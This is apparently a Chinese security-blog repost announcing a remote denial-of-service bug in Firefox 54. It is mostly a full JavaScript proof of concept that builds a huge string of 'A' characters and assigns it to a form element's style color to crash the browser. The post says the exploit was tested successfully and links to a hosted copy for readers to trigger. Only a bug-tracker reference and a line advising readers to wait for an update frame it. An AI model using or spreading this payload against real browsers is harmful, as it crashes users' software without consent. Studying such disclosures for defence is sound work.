最新版火狐远程DoS漏洞,亲测成功​(求关注,良心推送)

释放双眼,带上耳机,听听看~!

(求关注,良心推送)

火狐浏览器Firefox 54.0.1(最新版)远程DoS漏洞

问题出在某些标签的超长样式及颜色属性字符串。

POC如下:

<html>

<body>

<script>

//Windows 7 x64

//FireFox v53.0.3 (32-bit) Crashes

//Credits: John Page / hyp3rlinx

//ISR: ApparitionSec

//hyp3rlinx.altervista.org

var p1 = “\x41”;

for (var c=0;c<0xC350;c++){

p1+=”\x41″;

}

var p2=”\x41″;

for (c=0;c<0x1388;c++){

p2 += p1;

}  

var el = document.createElement(‘FORM’) //IMG,FORM,DIV,P,A,H2,IFRAME,TABLE,TEXTAREA

el.style.color=p2

document.body.appendChild(el)

 

</script>

</body>

</html>

想直接测试的可点击下面的链接:

https://bug1376692.bmoattachments.org/attachment.cgi?id=8881644

相关链接如下

https://bugzilla.mozilla.org/show_bug.cgi?id=1376692#a465096_417288

解决方案:坐等更新

本文源自微信公众号:黑鸟

人已赞赏
安全工具

能远程控制你电脑的苹果充电线正在生产和售卖,走一个?

2019-10-16 10:45:37

安全工具

重大更新:微软发布具有DNS查询日志记录功能的Sysmon,并修补21个严重安全漏洞

2019-10-16 10:45:42

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索